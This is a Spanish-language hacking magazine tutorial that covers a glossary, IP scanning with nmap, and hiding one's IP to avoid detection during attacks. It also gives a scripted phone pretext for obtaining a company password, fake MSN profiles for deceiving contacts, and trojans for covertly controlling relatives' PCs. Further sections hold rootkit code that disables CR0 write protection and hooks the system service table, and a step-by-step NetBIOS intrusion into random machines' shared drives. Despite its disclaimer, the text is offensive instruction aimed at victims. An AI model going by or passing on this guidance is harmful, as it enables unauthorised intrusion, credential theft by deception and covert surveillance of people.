Seguridad y Hacking
Short Description
Download Seguridad y Hacking...
Description
La intención de la presente publicación no es fomentar la piratería informática ni la “delincuencia” en la red. No nos hacemos responsables de la utilidad que se le den al conocimiento aquí adquirido. El uso de los mismos queda bajo exclusiva responsabilidad de quien los utilice. Nuestro objetivo con esta revista es terminar con la basura de la red (lammers y otras esencias) con el único método que conocemos, la EDUCACION y con una única bandera que será siempre nuestra firma. “SOLO EL CONOCIMIENTO TE HACE LIBRE”
Estos conceptos son simplemente para recordar y facilitar la lectura de la revista, siendo más cómoda su lectura como su comprensión. Hacker: Hacker es el concepto utilizado para referirse a un experto en varias o alguna rama técnica relacionada con la informática: programación, redes de computadoras, sistemas operativos, hardware de red/voz, etc. Se suele llamar hackeo y hackear a las obras propias de un hacker. Cracker: Un cracker es algo parecido al hacker. El cracker es alguien capaz de violar la seguridad informática de un sistema, pero a diferencia del hacker, este lo hace con la intención de hacer daño, o como beneficio personal. Noob: este termino es aplicado a un novato que postea incorrectamente e, fuera de lugar, incumple las normas y/o falta al respeto a otros usuarios. Es rechazado por los demás usuarios, recibirá ignorancia y malas contestaciones a sus posts y seguramente será banneado por el administrador. Suele ser también un spammer y/o flooder Newbie: o también novato. Es un usuario recién llegado al
foro. Postea correctamente y se integra sin problemas en el ambiente del foro, por lo que pasado cierto tiempo será un usuario normal del foro Flood: significa colocar muchos mensajes de seguido en un foro. Casi siempre es referido a colocarlos uno tras otro, pero también se puede considerar flood cuando 2 o más usuarios colocan mensajes cortos para hablar entre ellos, como si fuese una conversación en tiempo real. Una persona que hace flood se la denomina flooder. Un flooder suele ser tachado de querer conseguir aumentar a toda costa su marcador de mensajes puestos en el foro Lamer: Un lamer es alguien inmaduro, que se las da de hacker, cuando en realidad, lo único que hace es seguir los pasos de lo que dicen los manuales, sin molestarse en aprender el porque de las cosas, y después, va fardando de que lo ha conseguido, y acreditándose meritos que no son suyos. En muchas ocasiones plagiando manuales y diciendo que han sido creados por el. Troll: se trata de un mensaje en contra de la temática del foro, es de una tonalidad hostil y provocativa, y suele provocar una grave e inútil discusión. Tiene como fin causar un mal ambiente y/o interrumpir un tema. Puede ser el principio de un tema o aparecer en medio de un hilo ya iniciado. También se denomina troll a la persona que postea un mensaje de este tipo. Estos son los términos para nombrar los “Hackers y No Hackers” según su categoría. Ahora un poco de vocablo hacker: ADMINISTRADOR, sysop, root: Es la persona que se encarga del sistema, la que tiene el poder absoluto sobre la maquina, a estos se les suele denominar r00t. AGUJERO, bug, hole: Es un defecto en el software o hardware que como su nombre indica deja agujeros para que los crackers en ocasiones los utilicen a su favor. AIX: Sistema operativo de IBM BUGS y EXPLOITS: Los bugs son fallos en el software o en el hardware, los cuales los hackers como crackers los utilizan para penetrar un sistema. Un exploit es un programa que aprovecha el agujero dejado por el bug. Ver AGUJERO. BOMBA LOGICA: Código que ejecuta una particular manera de ataque cuando una determinada condición se produce. Por
ejemplo una bomba lógica puede formatear el disco duro un día determinado, pero a diferencia de un virus.. La bomba lógica no se replica. BACKDOOR: Puerta trasera. Mecanismo que tiene o que se debe crear en un software para acceder de manera indebida. Este es aprovechado muchas veces por los crackers para vulnerar un sistema. BOXING: Uso de aparatos electrónicos o eléctricos (Boxes) para practicar el phreacking, no hace recordar que Hacking & phreacking no son lo mismo... En el phreacking hay blue box, red box, etc. BOUNCER: Técnica que consiste en usar una maquina de puente y que consigue que tel-neteando al puerto xxxx de la maquina "bouncerada" te redirecciona la salida a un puerto determinado de otra maquina. Esta técnica es muy usada en el irc redireccionando a los puertos destinados a los servidores de irc por anonimicidad y otros temas que no vienen al caso. CABALLOS DE TROYA: Programa que se queda residente en un sistema y que ha sido desarrollado para obtener algún tipo de información. Por ejemplo seria un caballo de Troya un programa que al ejecutarlo envía el fichero de /etc/passwd a una determinada IP (Casualmente la nuestra). COPS: Programa de seguridad. CERT (Computer Emergency Response Team): Es una gente que se dedica de trabajar en seguridad pero que en su esfuerzo por informar de bugs nuevos, en si estas personas nos ayudan más a nosotros que a ellos. CLOACKER: Programa que borra los logs (huellas) en un sistema. También llamados zappers. CRACKER: Esta palabra tiene dos acepciones, por un lado se denomina CRACKER a un HACKER que entra a un sistema con fines malvados aunque normalmente la palabra CRACKER se usa para denominara a la gente que desprotege programas, los modifica para obtener determinados privilegios, etc. CRACKEADOR DE PASSWORDS: Programa utilizado para sacar los password encriptadas de los archivos de passwords. DAEMON: Proceso en background en los sistemas Unix, es decir un proceso que esta ejecutándose en segundo plano.
EXPLOIT: Método concreto de usar un bug para entrar en un sistema. FUERZA BRUTA: Es el procedimiento que usan tanto los crackeadores de password de UNIX como los de NT (o por lo menos los conocemos) que se basan en aprovechar diccionarios para comparar con los passwords del sistema para obtenerlos. FAKE MAIL: Enviar correo falseando el remitente. Este método es muy útil en ingeniería social. GRAN HERMANO: Cuando la gente se refiere al Gran Hermano, se refiere a todo organismo legal de lucha contra el mundo underground. GUSANO: Termino famoso a partir de Robert Morris, Jr.Gusanos son programas que se reproducen ellos mismos copiándose una y otra vez de sistema a sistema y que usa recursos de los sistemas atacados. INGENIERIA SOCIAL: Obtención de información por medios ajenos a la informática. IRIX: Sistema operativo. ISP (Internet Services Provider): Proveedor de servicios internet. KEY: “Llave”. Se puede traducir por clave de acceso a un software o sistema. KERBEROS: Sistema de seguridad en el que los login y los passwords van encriptadas. KEVIN MITNICK: Es el hacker por excelencia! Sus hazañas pueden encontrar en mil sitios en la red. Aunque algunos cibernautas dicen no ser cierta algunas de esas hazañas. LAMER: Un lamer es una persona que no tiene ninguna inquietud por todos estos temas de la seguridad. Estas lo único que quiere es tener un login y un password para entrar a un sistema y formatear el disco duro, o para decirle a un amigo que es un “Hacker". LINUX: Sistema operativo de la familia UNIX, de bajos recursos. Este sistema operativo es ideal para practicar Hacking. LOGIN: Usuario & contraseña con los cuales puedes obtener acceso al sistema.
MAQUINA: Habitualmente se utiliza para nombrar el “Ordenador” o el “PC”. MAIL BOMBER: Es una técnica que consiste en el envío masivo de mails a una dirección (para lo que hay programas destinados al efecto) con la consiguiente problemática asociada para la victima. Solo aconsejamos su uso en situaciones críticas. NUKEAR: Consiste en “joder” o “molestar” a gente debido a bugs del sistema operativo o de los protocolos. PASSWORD: Contraseña asociada a un login. También se llama asi al famoso fichero de UNIX /etc/passwd que contiene los passwords del sistema. PIRATA: Persona dedicada a la copia y distribución de software ilegal, tanto software comercial crackeado, como shareware registrado, etc. PGP: (Pretty Good Privacy.) Necesario cuando se necesita enviar mails "calentitos". Es un programa de encriptación de llave pública. PORT SCANNER: Programa que te indica que puertos de una maquina está abierto. ROUTER: Maquina de la red que se encarga de encauzar el flujo de paquetes. SNIFFER: Es un programa que monitoriza los paquetes de datos que circulan por una red. Mas claramente, todo lo que circula por la red va en 'paquetes de datos' que el sniffer chequea en busca de información referente unas cadenas prefijadas por el que ha instalado el programa. SHELL: Este concepto puede dar lugar a confusión ya que una Shell en un sistema Unix es un programa que interactúa entre el kernel y el usuario mientras que en nuestros ambientes significa el conjunto de login y password.... Es decir que si alguien dice que cambia shells ya sabéis a lo que se refiere no? TCP/IP: Arquitectura de red con un conjunto de protocolos. Es la que se suele usar en Internet.. Para más info sobre el tema cualquier libro de TCP IP es valido.. TRACEAR: Seguir la pista a través de la red a una información o de una persona.
UDP: Protocolo de comunicación que a diferencia del TCP no es orientado a conexión. UNIX: Familia de sistemas operativos que engloba a SunOS, Solaris, irix, etc… VMS: Sistema operativo. VIRUS: Es un programa que se reproduce a si mismo y que muy posiblemente ataca a otros programas. Crea copias de si mismo y suele dañar o “joder” datos, cambiarlos o disminuir la capacidad de tu sistema disminuyendo la memoria útil o el espacio libre.
En el mundo del Hacking mis queridos amigos es muy importante dominar nuestro sistema operativo al 100%, no podemos hackear algo que no conocemos, al igual que no podremos defendernos. ¿Que es un Sistema Operativo? Un sistema operativo es un software de sistema, es decir, un conjunto de programas de computadora destinado a
permitir Comienza gestiona basicos,
una administracion eficaz de sus recursos. a trabajar cuando se enciende el computador, y el hardware de la maquina desde los niveles mas permitiendo tambien la interaccion con el usuario.
¿Qué es Windows? Windows es una familia de sistemas operativos desarrollados y comercializados por Microsoft. Existen versiones para hogares, empresas, servidores y dispositivos moviles, como computadores de bolsillo y telefonos inteligentes. Ejemplo de un escritorio de Windows:
Linux (tambien conocido como GNU/Linux) es un sistema operativo tipo Unix que se distribuye bajo la Licencia Publica General de GNU (GNU GPL), es decir que es software libre. Su nombre proviene del Nucleo de Linux. Ejemplo de escritorio de Linux:
Registro de Windows El registro del sistema, o registro de Windows, es una base de datos que almacena las configuraciones y opciones del sistema operativo Microsoft Windows Para acceder a el Registro desde Nuestro ordenador debemos de hacer lo siguiente: (Inicio --> Ejecutar --> Regedit) Podemos ver que nuestro Registro se encuentra MI PC como la cabeza. luego debajo vemos 6 subarboles, y estos 6 subarboles se dividen en claves y las claves se dividen en sub claves, aqui en los foros de hacking se habla con el termino de "ramas" . un ejemplo de como actua el registro de Windows es el siguiente: vamos a la rama HKLMachine\Software\Microsoft\Windows\CurrentVersion\Run en esta rama estan las cosas que se inician con windows para que me entiendan, es como cuando uno prende su ordenador
y inmediatamente se les abre el antivirus, ustedes lo abrieron? no, se inicia con windows, esto es bastante util. y bueno muchas cosas mas del registro nos pueden ser Utiles. Mas sobre el registro Aqui Introduccion al Registro 3.4 Firewall de Windows El Firewall de windows nos ayuda con la proteccion de nuestro sistema operativo, su funcion en nuestro ordenado es supervisar la informacion que pasa entre nuestros ordenadores y internet. nos puede ayudar al momento de que alguien quiera entrar a nuestro ordenador, y en algunos casos bloquea programas sospechosos o que posiblemente tengan un uso que nos pueda perjudicar.
…
¿Qué es una IP? Las direcciones IP (IP es un acrónimo para Internet Protocol) son un número único e irrepetible con el cual se identifica una computadora conectada a una red que corre el protocolo IP. Una dirección IP (o simplemente IP como a veces se les refiere) es un conjunto de cuatro números del 0 al 255 separados por puntos. En realidad una dirección IP es una forma más sencilla de comprender números muy grandes, la dirección 200.36.127.40 es una forma más corta de escribir el numero 3357835048. Esto se logra traduciendo el número en cuatro tripletes. Todo lo que se puede hacer con una IP Con una IP podemos hacer muchas cosas los Cyber policías encuentran pedófilos o Cyber criminales por medio de la IP. a. Geolocalizar una IP Para poder saber todo esto debemos entrar a esta Pág. → http://www.ip-adress.com/
Cuando entremos nos va a salir los datos de nuestra IP y un mapa con nuestra localidad. Una vez que estamos en la página hacemos clic en donde dice lo siguiente: “For IP to Location, IP Tracing, Broadband Speedtest and more tools click here” y proseguimos a colocar la IP que queremos Localizar:
b. Escanear IP Con esto podemos saber que Sistema Operativo usa y que puertos tiene abiertos. Esto nos puede ayudar mucho mas adeltante, asi que pongan mucha atencion. Para esto necesitamos ocupar nuestro querido amigo Nmap. Una vez que lo descomprimimos lo debemos de colocar en esta direccion --> c:\nmap Luego en nuestro cmd debemos de colocar:
De esta manera nuestro cmd se ubica donde se encuentra el Nmap. Luego colocamos esto en nuestro cmd: “nmap -A IP”
→ Sin las comillas.
y de esta manera podremos saber que puertos tiene abiertos.
Recuerda que si sabes explotar puertos, puedes tener tu el control del pc. TCP/IP
Juntos los protocolos TCP e IP conforman un protocolo o mas bien un conjunto de protocolos estandares para la comunicacion entre pcs, cada uno tiene una funcion diferente, el TCP se encarga de el flujo de datos, y el IP se encarga del direccionamiento de dichos datos o paquetes. Recomiendo leer algun manual sobre TCP/IP, no solo porque el tema es extenso, sino porque tambien es bastante complejo. ¿Cómo ocultar una IP?
Esto es algo muy necesario, ya que mas adelante cuando hagamos ataques en muchas ocaciones nos sera util ocultar nuestra IP, para que no nos descubran.
Forma facil de ocultar la ip Con estas herramientas podemos ocultar nuestro IP: -TOR (Vidalia) -Mozilla Firefox Ya una vez descargada la instalamos y nos quedara algo como esto:
Si todo va bien hasta aqui ahora descargamos este plugin para firefox... (https://addons.mozilla.org/esES/firefox/addon/2275) Lo instalamos y despues reiniciamos firefox, nos debera salir esto en la esquina inferior derecha del navegador...
Solo damos un click izquierdo con nuestro Mouse para activarlo y ya debemos de tener nuestra ip oculta...
y ahora, para comprobar...nos dirigimos a → www.cualesmiip.com Y si queremos renovar nuestra identidad solo damos un click en nueva identidad... Bueno eso es todo, la unica desventaja de trabajar con proxys es que nuestra navegacion se vuelve mas lenta asi como las descargas debido a que se crea una red virtual entre nosotros y la red…
Si tienes conexión a Internet, recomiendo que veas este videotutorial explicativo: (http://www.youtube.com/watch?v=muh9u_F5oeg&feature=player_ embedded) Esta muy completo.
Ingenieria Social - "Hackeando al humano tras la pantalla" Esto es una introducción al arte de la “Ingenieria Social”, no esperes ningun metodo revolucionario o magico. Con esto aprenderas las normas basicas sobre este tema y podras formular tus propios metodos. ¿Ingenieria Social? La ingenieria social se usa desde hace mucho antes que todo esto del hacking, esto comenzo en otra subcultura underground llamada phreaking .En esta area la ingenieria social era utilizada para conocer datos sobre las operadoras de Telefono o para obtener contraseñas o numeros internos de las compañias de telefonia de la epoca. En fin la ingenieria social consiste en inducir a una persona a hacer algo que nosotros queremos. Por ejemplo para dar un ejemplo practico para darnos su clave de msn. El "arte" de la manipulacion requiere sobre todo de imaginacion e inmersion en
el papel que hagamos. Cabe destacar que la ingenieria social se puede aplicar en todo tipo de medios, ya sea telefono, mensajeria instantanea (msn por ejemplo), mail, en persona (esto requiere mas experiencia pero tambien es una opcion) y muchos mas. Las posibilidades son casi infinitas. Recuerden esta frase... "La debilidad mas grande de un sistema no esta en las computadoras sino en los humanos que las manejan" Comenzando Para introducirnos en este mundo les ejemplo de una conversacion, en este individuo tratara de convenser a una de que le de la contraseña de acceso
mostraremos un dialogo de caso telefonica donde un operadora de una empresa del sistema.
Operadora: Hola si, administracion Miguel y asociados, en que puedo ayudarle? Atacante: Mire soy alejandro rolando del personal del sector de informatica, se me rompio el telefono movil y no he podido ingresar al sistema para verificar el firewall externo y la ventilacion del servidor principal (Siempre usa vocavulario tecnico o incluso inventos que suenen tecnicos, te hacen dar una imagen de profesionalidad y credibilidad. Es muy importante no lo olvides de esa forma de enserio pensaran que eres de esa area.) Operadora: En que podriamos ayudarle? Atacante: Lo mas facil seria que me facilite la nueva contraseña asi yo podria ingresar y seguir con mi trabajo antes de que el supervisor me presente una sacion por no haber estado activo estos ultimos 2 dias. Operadora: No estoy segura, esto tal vez deba hablarlo con el tecnico de turno asi podrian llegar a un acuerdo. (Descuida siempre surgen imprevistos, en estos casos inventa evasivas y trata de siempre hablar con gente "ignorante" en el tema, hablar con alguien que sabe tanto o mas que tu seria lo peor que te puede pasar) Atacante: No, porfavor le avisara al supervidor y esto puede costarme el empleo. Operadora: De acuerdo, dejeme su telefono y le avisare cuando consiga la contraseña para que pueda volver al trabajo (No conviene nunca dejar inf. personal cuando haces ing. soc., en estos casos puedes crearte por ej una direccion de correo para la ocacion, tal como en este caso podria ser miguel4@informàtica.com) Atacante: No creo estar disponible para una llamada, pero podria enviarmelo a mi casilla de mail? Operadora: de acuerdo, deje su mail. Atacante: miguel@informàtica.com
Operadora: Bueno muchas gracias, en breve tendra su respuesta. Atacante: Exelente, adios que tenga buen dia. Con este ejemplo queda bien claro lo que trataremos. Un punto importante en la ingenieria social y mas si es por telefono, es la naturalidad al hablar. Nunca debemos ponernos nerviosos y debemos anticipar todo lo que nos pueda decir el otro. Como casi todo, debes practicar mucho antes de lanzarte a la practica, una buena ayuda es provando primero con amigos o talvez pequeños locales como almacenes para "entrar en calor" no seria para nada sensato provar de entrada con una empresa. Ademas que si cometes algun error con una empresa y te descubren es muy posible que te rastreen, por eso tambien es muy importante dejar la menor informacion real posible. Otros metodos & consideraciones Otro metodo factible y muy de moda, es la ingenieria social por msn. Basicamente esta consiste en 4 pasos: a. Crear un msn ficticio. b. Conseguir una serie de fotos (de chicos o chicas dependiendo con quien vamos a usar el metodo. Otra cosa, por mas que lo tomo como sobreentendido y es sentido comun, las fotos deben ser de la misma persona no sirve tener 3 fotos de distintas personas) para nuestro avatar o simplemente para pasarle al contacto. c. Preparar el msn para que quede como uno de verdad, agregandole un nombre adecuado, un buen avatar (vease punto 2) y otros detalles o consideraciones personales. d. Agregar el contancto. Luego de esto, solo basta con convenser al otro desde el principio, dandole cierta seguridad de que te conoce aunque no te tiene presente. Como logramos esto?? Bueno por ejemplo cuando lo agregamos nos dice (esto pasa el 99% de las veces) "Quien eres?? quien te ha dado mi msn???". En este caso particular, le damos el nombre que hemos elegido e inventamos una situacion falsa tal como... "soy romina, no recuerdas??? nos conocimos en la disco el sabado pasado, anotaste tu msn en mi brazo" o "soy romina, amiga de sofia, me dijo que eras un chico muy apuesto y que podria charlar contigo sin tener ningun problema". Alagar a nuestro contacto tambien es un elemento poderoso, lo hara ganar confianza y pensar que de verdad esta llevando la situacion. (Siempre es bueno tener algo de información sobre el contacto). “No existe una guia de Ingenieria Social, ya que esta tecnica la desarrolla uno mismo, ideando sus propios metodos para llevarlos a la practica”
La adminitracion Remota es controlar otro PC a distancia, osea poder manipular la PC de otra persona, existen muchos sofwares que nos permiten eso, incluso el mismo windows tiene incorporado la administracion Remota, pero para eso los 2 ordenadores deben de estar de acuerdo, la idea es poder controlar el PC de tu hermana, hermano, primo, tio, amigo, enemigo, papa, mama, perro, [pero sin que ellos sepan]. Para esto, existen nuestros amigos, los troyanos. Troyanos Un troyano te permite controlar la PC de otra persona remotamente. Podras ver lo que este haciedo, controlar todo lo que escriva, robarle, borrarle, cambirle de nombre, y subirle archivos, programas, fotos o lo que quieras... ver la informacion de su sistema, entrar en su registro, en la consola...etc.
Partes de un Troyano Un troyano consta principalmente de 2 partes. Una se llama cliente.exe y otra server.exe (el server lo devereis crear ustedes mismos). cliente.exe Este es el archivo que deberas ejecutar en tu PC & con el cual controlaras a tus victimas. server.exe Es el archivo que debes de enviar y tus avictimas deveran ejecutar. Una vez ejecutado, ya podras controlar remotamente su PC ¿Que tipos de Troyanos existen? Existen dos tipos de Troyanos, los de conexión directa y los de conexión inversa. Los de conexion inversa Se conectan a tu PC sin necesidad de tener que conocer la IP de tu victima. Es decir, una ves tu victima ejecute tu troyano, ya no lo tendra que volver a hacer puesto que este ara que la victima se conecte a tu Pc automáticamente. (Estos son los mejores desde nuestro punto de vista). Los de conexion directa Son algo mas complicados de mantener a la victima, puesto que tras enviarle el server, despues deveremos meter su ip para conectarnos a el y poder controlar a nustra victima. Pero claro, el problema esta en que deveremos averiguar la ip de nuestra victima, y que como las ip cambian.. la tendremos q averiguar una y otra y otra vez... Botnet El artífice de la botnet puede controlar todos los ordenadores/servidores infectados de forma remota y normalmente lo hace a través del IRC. Sus fines normalmente son poco éticos. En la botnet, los bots son igual que las víctimas de los troyanos, a los cuales, podremos controlarles, según las características del troyano que hayamos creado o descargado. Podremos usar el keylogger, ver la info del PC…etc. Rootkits Los rootkits, el tema es extenso así que daremos definiciones y ejemplos ficticios de su utilización para pasar directamente al funcionamiento interno de estas importantes herramientas, las cuales no solo funcionan como troyanos a nivel kernel: su importante uso compromete el sistema de manera irreparable, por ello es de suma importancia conocer su funcionamiento no
solo para lograr defendernos... sino para lograr alterar su composición básica y lograr la mutación adecuada asegurando el acceso al sistema comprometido en distintas ocasiones. Para esto me centraré en los rootkits que tienen como target principal los sistemas Windows. La actividad básica que realiza un rootkit para su correcto funcionamiento son la desactivación del registro de sucesos en el sistema para un usuario determinado (Administrator) refiriendose a la auditoria interna, permite el acceso al sistema como administrador utilizando un usuario/contraseña oculto. Desactiva de manera directa la seguridad mediante la aplicación parches en el kernel, tratandose esta, la acción mas disruptiva y sensible en la manera de operar de todo rootkit. Mediante estas actividades se asegura que el sistema vulnerado podrá ser accesado de nuevo por el intruso, sin que este de señales de alerta. Para llevar a cabo estas tareas un rootkit posee un conjunto de herramientas las cuales son capaces de sustituir los archivos binarios por otros troyanizados, esto no es dificil de creer pues un rootkit se ejecuta una vez obtenida la cuenta de Administrador, lo cual permite sobreescribir y manipular los ejecutables del sistema. Ahora bien, para lograr su cometido todo rootkit primero requiere ocultarse al sistema fuente. para ello realiza la captura de funciones a nivel sistema (INT2Eh). Las llamadas indispensables que se capturan para después troyanizarlas son las siguientes: -
ZwCreateFile ZwOpenFile ZwQueryDirecto ryFile ZwOpenProcess ZwQuerySystemI nformation
A nivel programación esto se logra en la gran mayoria de los casos con ansi C incrustando código ASM donde este último es el verdadero malicioso, este es un fragmento de código con el cual se realiza una captura de una llamada a sistema: mov lea int ret
eax, 0x0000001A edx, [esp+04] 0x2E 0x2C
donde: EAX --> Es el identificador de la funcion. EDX --> Es un puntero a los parámetros en la stack.
Básicamente se deposita la dirección base de la IDT en la localización especificada en el segundo parámetro indicado por esp, a partir de la base se puede indexar el descriptor de una interrupción, manipulando su selector y su desplazamiento . Una vez alcanzado este nivel de privilegios, el sistema depende por completo de los descriptores y sus posibles desplazamiento s llevados a cabo por el rootkit mediante el programa especifico destinado para esta función. Las APIs de KERNEL32 son un envoltorio entorno a las APIs de NTDLL, mucho más primitivas. Por lo tanto cada servicio del sistema posee un identificador. 12bit > Identificador del servicio. 2bit > Tabla de servicios a emplear. 0 > Servicios del núcleo (NTDLL). 1 > Servicios del entorno gráfico (WIN32K). 2 y 3 > No se emplean. 18bit > Reservados este identificador es utilizado por el rootkit para manipular e interceptar el servicio objetivo, para ello el código de una función comienza cargando dicho identificador del servicio en EAX, sabiendo esto de antemano la línea básica para lograr esto sería: MOV EAX,id ; A5h XX XX XX XX Ahora bien, cual es el verdadero proposito de todos estos conceptos? pongamos un ejemplo práctico, supongamos que deseamos ejecutar Vanquish Rootkit en un sistema Windows Server Enterprise 2003 R2, recién parcheado por el administrador de sistemas y puesto a disposición de un IPS, que pasaría al tratar de instalar nuestro rootkit? quizá la instalación procederia sin ningún problema pues el IPS entra en acción una vez que el los ejecutables que forman el rootkit comienzan a aplicar el payload, una vez instalado sería inútil pues Vanquish realiza la captura de las funciones del sistema alterando la tabla de servicios, para evitar esto Microsoft decidio denegar el acceso a la escritura a partir de Windows XP el cual es el sistema mas atacado pues es un blanco mas común entre intrusos. La versión Server de windows 2003 es una versión mucho mas robusta y modular de este SO que permite la ejecución de llamadas a sistema permitiendo sobreescribir el id de urgencia, pues son equipos que regurlarmente son conectados a otros equipos de storage. Los cuales requieren altos privilegios cuando realizan replicaciones relacionadas no solo con el storage sino también con el SO. Debuggeando un poco un agente de storage podemos percatarnos
que en algunos casos, estos desactivan la protección de escritura en el registro de control CR0 para realizar funciones de mantenimiento, esto "supuestamente" es información confidencial de los fabricantes, pero al instalar dichos agentes es bastante predecible que lo hacen pues tratandose de storage de alto rendimiento Hitachi, EMC y SUN apuestan a la constancia en linea de sus equipos de storage que a la seguridad aplicativa/abstractiva... debuggeando un poco un agente de storage del cual guardaré su confidencialid ad, encontramos lo siguiente: #define WPOFF() \ _asm mov eax, cr0 \ _asm and eax, NOT 10000H \ _asm mov cr0, eax #define WPON() \ _asm mov eax, cr0 \ _asm or eax, 10000H \ _asm mov cr0, eax *Obtenido con CDB. Esto es, la desactivación de la protección y escritura del registro de control CR0, basta crear las macros para su ejecución y despues modificar a nuestro gusto la tabla de servicios de la siguiente manera: DbgPrint( ( "GKit: HookSystemServ ice() Hooking SST %x Index %03x Old %08x\n", ulSST, ulIndex, ( ULONG) pfnOldHandler)) ; __try { WPOFF() ; pfnOldHandler = InterlockedExc hangePointer( pfnHandler, pfnNewHandler) ; WPON() ; DbgPrint( ( "GKit: HookSystemServ ice() Done\n")); //Si funciona } __except( EXCEPTION_EXEC UTE_HANDLER) { pfnOldHandler = pfnHandler ; DbgPrint( ( "GKit: HookSystemServ ice() Hook failed can't write\n")) ; //No funciona } No trataré de explicar el código anterior pues es muy predecible y esta no es el objetivo de este paper, empero,
basta observar la función hook con la cual se parchea la tabla. Esto es lo que haría un rootkit luego de desactivar los registros de control, los cuales, en muchos sistemas se encuentran desactivados por software propietario de storage los cuales en algunas ocasiones hay que conocerlos para simplificar nuestro trabajo. De esta manera un rootkit toma control del sistema, es importante conocer estos conceptos básicos para dejar de ser simples usuarios que al obtener un error de ejecución opta por cambiar de aplicación, en lugar de comprender el porque de ese error y cual es su posible solución. Esto nos da un doble valor agregado... es mas probable que un rootkit se ejecute correctamente en un servidor de alto rendimiento que un equipo windows XP con todos los hotfix aplicados al día, debido a la gran cantidad de aplicaciones tipo socket controladores que poseen. Y, si tomamos en cuenta que en la actualidad los "agentes" (un simple socket) trabajan por UDP entre servidores que alcanzan la red externa de las empresas (discos por iscsi, servidores front-end con bases en oracle atacheadas a storage comunicado por agentes etc etc, pues se trata de una necesidad BASICA), se puede observar que el campo de posibles sistemas vulnerables a este tipo de accionar es muy amplio. Solo basta saber en donde buscar y como hacerlo. Por ejemplo: Operation Manager... software que sirve para obtener información acerca de la topología e infrastructura a nivel aplicativo y de storage en toda un red... trabaja por los puertos 8752 y 8753 de manera predeterminada para los sistemas hitachis UPS y estos a su vez poseen una consola basada en Windows 2000... el campo es muy amplio, obvio Vanquish es un rootkit antiguo, conseguir rootkits actuales no es imposible. Hemos sido muy breve pues es muy dificil tratar de explicar todas y cada una de las acciones que toma en cuenta un rootkit para asegurar el sistema a un intruso, pero creo que los aspectos básicos de funcionameinet o fueron abordados de manera concreta.
Ahora comenzaremos recien con el Hacking, el conocimiento previo (Debemos dominar al 100% la informacion adquirida, & tambien saber aplicarla), ahora hablaremos de “intrusión” o “ataque”, esperando que obtengan todo el conocimiento posible. Recuerda que siempre debemos tener la Etica por sobre todas las cosas. Intrusión mediante el protocolo NETBIOS con Windows XP Herramientas requeridas: IpScan
Un sucio Rango de IP’s Sabiendo que es una IP, con esto nos viene una pregunta, ¿qué por la mamá de Tarzán y la virgen María juntos es un Rango de IP’s? Un rango de IP’s es todo lo que abarca un Comienzo de IP y un Fin de IP, “¿Qué decimos? Se preguntarán”, es fácil, les doy un ejemplo: Comienzo de IP 129.39.59.0 Fin de IP 129.39.59.255 Por si no esta claro daremos otro ejemplo: El comienzo es 129.39.59.0, después de ésa IP sigue 129.39.59.1, después 129.39.59.2 y así sucesivamente hasta llegar a 129.39.59.255. Eso es un Rango de IP’s. Configurando Ya dejémonos la teoría y comencemos a moverle a la computadora (cuidado que las PC son del diablo y nunca sabes cuando te va a aparecer un BSOD). Comencemos configurando nuestra PC para que tenga habilitado el protocolo NETBIOS, lleven a cabo lo siguiente: Clic en Inicio. Clic en Panel de control. Clic en Conexiones de red. Doble clic sobre el icono de conexión (puede que tengan varias conexiones, así que asegúrense de que sea la conexión que usan para acceder a Internet). Clic en Propiedades. En la ventana que apareció, den doble clic sobre Protocolo Internet (TCP/IP). Clic en Opciones avanzadas. Clic en la pestaña WINS. Clic sobre Habilitar NetBios sobre TCP/IP. Clic en Aceptar (lo mismo para las demás ventanas). Habilitando el protocolo NetBios Ya que tenemos habilitado el protocolo NETBIOS en nuestra PC, procedemos a abrir la aplicación llamada IPScan para configurar algunos parámetros. Abrimos las opciones (Options-->Options) y damos clic en Only alive y después clic en el botón OK & Save. Ahora introducimos nuestro Rango de IP’s.
Recuerden comienzo de IP y fin de IP, el comienzo de IP lo vamos a colocar en el primer cuadro donde dice IP range y el Fin de IP en el cuadro donde dice To. Noten que los cuadros están encerrados por un círculo en la siguiente figura (también se muestra la configuración de la aplicación):
Haciendo “cochinadas” y un poco de Spam. Ahora, lo que falta por hacer es dar clic en el botón Start y esperar a que termine de buscar todas nuestras IP’s, (cabe mencionar que si no existe ninguna IP “viva” o activa en el Rango de IP’s que dieron, no les va a aparecer ninguna máquina conectada, así que es probable que tengan que definir otro Rango de IP’s.) Ahora, suponiendo que ya tienen un rango de IP’S con maquinas conectadas les va a aparecer un mensaje indicado el rango de ips, la cantidad de ips que se buscaron y las maquinas conectadas. Al lado derecho encontrarán todas las máquinas conectadas (las van a identificar inmediatamente pues tienen un círculo azul a su derecha). No está de más especificar que tapé con una asquerosa pero prudente raya negra todas las IP’s (por
cuestiones de seguridad), así que no esperen ver esa misma raya negra en su máquina. Ver siguiente figura:
Máquinas conectadas encontradas y cuadro de información. Ahora viene lo bueno, Damos clic sobre la columna llamada IP (se encuentra encerrada por un círculo) y damos clic derecho sobre una IP (la que más mal les guste) y elegimos Show-->Show NetBIOS info. Ver siguiente imagen:
Clic derecho sobre columna IP y sobre una IP A partir de aquí les puede aparecer dos mensajes, uno es un cuadro mostrando información sobre la máquina. Ver siguiente imagen:
Información sobre PC
Y el otro mensaje es uno indicándonos que la máquina no tiene el protocolo NETBIOS habilitado. Ver siguiente imagen:
La máquina no tiene el protocolo NETBIOS habilitado. Suponiendo que les aparecio el mensaje indicando la información NETBIOS de la máquina, deberán abrir la consola de MS-DOS (Inicio-->Clic en Ejecutar-->Escriben CMD), estando en la consola de MS-DOS escriben lo siguiente: NBTSTAT –A IP_Maquina donde IP_Maquina es la IP de la máquina que les mostró la información. En la siguiente imagen se muestra una IP falsa, pero tomémosla como ejemplo: NBTSTAT –A 111.111.111.22. Les va a aparecer el nombre de la máquina con algunos números raros a la derecha (lo que se encuentra encerrado por un círculo). Ver imagen:
Usar NBTSTAT –A (numeros raros de la derecha). Bueno, ya dejémonos de "cochinadas" y enfoquémonos a una máquina que sí tenga
recursos compartidos... Repitan los pasos anteriores (busquen una maquina) hasta que encuentren una máquina que les muestre lo que en la siguiente imagen se encierra (ejemplo con otra IP):
Máquina con recursos compartidos Si notaron, la imagen anterior muestra el nombre de la máquina (lado izquierdo) y el número raro (lado derecho) el cual indica que sí comparte recursos (el número 20 indica eso). Lo siguiente por hacer es ver qué recursos comparte nuestra víctima, ejem, quiero decir cliente. Deberemos escribir: NET VIEW IP_Maquina donde IP_Maquina es la IP de la máquina conectada, en este caso tomaremos el siguiente ejemplo NET VIEW 222.222.222.222. Les acaba de mostrar los recursos que dicha máquina comparte (en este caso C, Documentos C, F y Mis documentos Audio. Ver siguiente imagen:
